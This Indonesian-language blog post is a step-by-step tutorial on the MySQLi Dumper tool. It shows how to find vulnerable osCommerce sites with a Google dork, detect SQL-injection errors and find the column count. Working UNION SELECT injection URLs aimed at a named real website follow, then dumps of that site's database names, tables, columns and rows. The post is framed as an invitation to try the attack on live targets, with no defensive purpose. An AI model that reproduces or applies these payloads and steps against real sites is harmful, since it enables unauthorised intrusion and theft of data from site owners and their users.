Today : | at : | Safemode : ON
English French German Spain Italian Dutch Russian Brazil Japanese Korean Arabic Chinese Simplified
Title Author Perms Comnt Modified Category
By --=:[./3r0r-c0d3]:=--
Fivers

MySQLi Dumper [./3r0r-c0d3] rwxr-xr-x 0 12:46:00 PM

Title MySQLi Dumper
Permission rw-r--r--
Author [./3r0r-c0d3]
Date and Time 12:46:00 PM
Category
Share
Mungkin ada yang masih bingung bagaimana menggunakan MySQLi dumper, kali ini kita akan mencoba membahasnya.
Jika ada yang belum tahu apa itu MySQLi dumper silahkan simak lansung dibawah ini

1.Bagian scanner.(untuk mencari target)
Untuk mencari target, masukkan dork di textbox di bawah tab Scanner, kita juga bisa memilih search Engine yang kita inginkan, kita bisa menggantinya, klik saja box yang ada disamping texbox untuk dork.
Kali ini kita mencoba menggunakan google.
Dengan dork "customer_testimonials.php?testimonial_id="
Nah, untuk mengatur jumlah page yang akan diload untuk mencari target,kita bisa mengaturnya pada "Search Pages (Approx):
Jika pengaturan sudah selesai, sekarang waktunya mencari target, kita tinggal klik tombol "Start Scann Link"

Beberapa saat kemudian, tunggu sampai proses selesai, targetpun akan muncul, belum apa apa saja, saya sudah mendapat 477 target, itu pun saya tidak menunggu sampai proses scanning selesai.

2.Untuk menscan target yang vuln SQLi , kita masuk ke tab "Vuln. SQL" lalu kita klik tombol "Start cann SQLi"
Tapi tunggu dulu, pada bagian "Spy word to check source SQL...bla..bla...bla" kita bisa menambahkan kata lain agar target yang didapat lebih memuaskan.
saya menabahkan kata lain sehingga menjadi:

sql syntax;sql erro;right syntax to use near;Warning: mysql_num_rows();You have an error in your SQL syntax;Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in;

Kita juga bisa mengganti SQLi-Inject Code dengan ' (quote)

Sekarang kitamulai scan.
Tunggu sampai proses selesai.
Nah, targetnya sudah kelihatan, saya mendapat 3 target yangvuln SQLi.
Sekarang waktunya kita scan jumlah kolom yang ada di web tersebut, misal target saya adalah
"http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3"

3.Untuk mencari jumlah kolom, masuk ke tab "Num.Blind"
Sekarang masukkan target ke textbox paling atas, namun sebelumnya tambahkan - setelah =
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=-3
Sekarang kita klik "Get Page"

Nah, keluar "The used SELECT statements have a different number of columns"
Berarti jumlah kolomnya salah, karena ini bug osCommerce maka kemungkinan jumlah kolomya diatas 7, jadi kita ganti angka 2 pada box di samping tombol "Get Page" dengan angka 7.
Ternyata error sama "1222 - The used SELECT statements have a different number of columns"
Kita coba angka 8, w00t w00t...error tidak terlihat dan keluar angka 3,4,dan 6.

Sekarang kita copy url pada text box disamping tombol "Get Page Manually"
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=-3/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8--
lalu kita gantikan angka yang keluar dengan [t]
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=-3/**/union/**/all/**/select/**/1,2,[t],4,5,6,7,8--

4.Sekarang kita masuk ke tab Dump MySQL.
Pada bagian inilah yang seru, kita bisa melihat database, table, column, serta data yang ada di column tersebut.
Copy url tadi ke textbox yang paling atas
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=-3/**/union/**/all/**/select/**/1,2,[t],4,5,6,7,8--

Pada bagian setup kita bisa mengatur jumlah data yang dapat kita ambil, Kita atur saja pada bagian "Max. Pages", kali ini saya membatasi 5000 page yang akan di load.
Jika sudah diatur, sekarang klik "Get Info" untuk mengetahui versi database version, server, dan user()

Nah, disitu sudah terpampang:

Version():5.0.67.d7-ourdelta-log
Server:Apache
User():OSC_Test5_0@64.202.163.143

Karena Version(): 5, maka kita dapat melihat nama database, table, column, serta data yang ada di web tersebut dengan mudah.
Sekarang klik "Get Data Base" beberapa saat kemudian, nama database yang ada di situs tersebutpun akan muncul,

Nah terlihat bahwa ada 2 database:
1.information_schema
2.OSC_Test5_0
Kita pilih OSC_Test5_0, kenapa bukan information_schema ?? karena tdatabase ini bukan database yang digunakan oleh cms pada web tersebut, yaitu osCommerce
Lalu klik "Get Tables"
Daftar table sudah muncul (hanya sedikit karena saya tidak menunggu sampai proses selesai)
Misalkan kita memilih table "banner", kita tinggal klik table tersebut lalu klik tombol "Get Columns"

Daftar column sudah ada:
Columnnya:
banners_group
banners_html_text
banners_id
banners_image
banners_title
banners_url
date_added
date_scheduled
date_status_change
expires_date
expires_impressions
status

Sekarang kita blok column yang ingin kita dump datanya, gunakan ctrl sembari mengklik column yang diinginkan, jika ingin me-dump lebih dari 1 kolom.
Jika sudah memilih, klik "Dump data (Selected Columns)"

Nah, proses dump berhasil:
banners_id banners_url status
1 http://www.oscommerce.com 0

Dengan keterangan:
banners_id= 1
banners_url= http://www.oscommerce.com
status= 0


Sekian dulu tutorial kali ini.

Selamat mencoba. GOOD LUCK
 Sumber : Code Security

Share

0 komentar:

Posting Komentar

terimakasih telah berkomentar dengan bijak, saya harap anda memberi kritik dan saran yang membangun...

Happy Reading ^_^

Diberdayakan oleh Blogger.